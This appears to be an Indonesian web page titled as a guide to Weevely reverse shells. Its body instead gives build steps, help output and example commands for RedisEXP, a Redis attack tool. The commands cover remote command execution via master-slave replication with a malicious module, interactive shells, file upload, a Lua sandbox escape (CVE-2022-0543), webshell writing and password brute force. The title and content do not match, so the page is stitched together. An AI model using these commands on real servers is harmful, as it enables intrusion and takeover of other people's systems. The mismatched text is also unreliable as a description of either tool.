Cara Reverse Shell Menggunakan Weevely Di Linux
Weevely adalah PHP web shell backdor yang mensimulasikan koneksi seperti telnet. …
Alat ini hanya untuk studi penelitian keselamatan pribadi. Segala konsekuensi dan kerugian langsung atau tidak langsung yang disebabkan oleh penyebaran dan penggunaan alat ini adalah tanggung jawab pengguna itu sendiri, dan pembuat alat tidak bertanggung jawab atas hal ini.
git clone https://github.com/yuyan-sec/RedisEXP.git
cd RedisEXP
go build
RedisEXP.exe -h
NAME:
Redis Exp - Redis 利用工具
USAGE:
Redis Exp [global options] command [command options] [arguments...]
COMMANDS:
help, h Shows a list of commands or help for one command
GLOBAL OPTIONS:
--rhost value, -r value 目标IP
--rport value, --rp value 目标端口 (default: "6379")
--pwd value Redis密码
--lhost value, -l value 本地IP
--lport value, --lp value 本地端口 (default: "21000")
--dll value, --so value 设置 exp.dll | exp.so (default: "exp.dll")
--cmd value, -c value 命令执行
--console 使用交互式 shell (default: false)
--exec 主从复制命令执行 (default: false)
--upload 主从复制文件上传 (default: false)
--rpath value, --path value 保存在目标的目录 (default: ".")
--rfile value, --rf value 保存在目标的文件名
--lfile value, --lf value 需要上传的文件名
--lua Lua沙盒绕过命令执行 CVE-2022-0543 (default: false)
--shell 备份写 Webshell (default: false)
--help, -h show help (default: false)
Command execution:
RedisExp.exe -rhost 192.168.211.128 -lhost 192.168.211.1 -exec -c whoami
RedisExp.exe -rhost 192.168.211.128 -lhost 192.168.211.1 -exec -console
RedisExp.exe -rhost 192.168.211.130 -lhost 192.168.211.1 -so exp.so -exec -c whoami
RedisExp.exe -rhost 192.168.211.130 -lhost 192.168.211.1 -so exp.so -exec -console
RedisExp.exe -rhost 192.168.211.128 -lhost 192.168.211.1 -upload -rfile 1.txt -lfile 2.txt
RedisExp.exe -rhost 192.168.211.128 -shell
RedisExp.exe -rhost 192.168.211.130 -lua -console
RedisExp.exe -r 192.168.211.128 -brute -pwdf ../pass.txt
Alat ini didasarkan pada sejumlah besar artikel dan alat luar biasa menulis Transkripsi selesai, terima kasih banyak untuk para pembagi tanpa pamrih ini!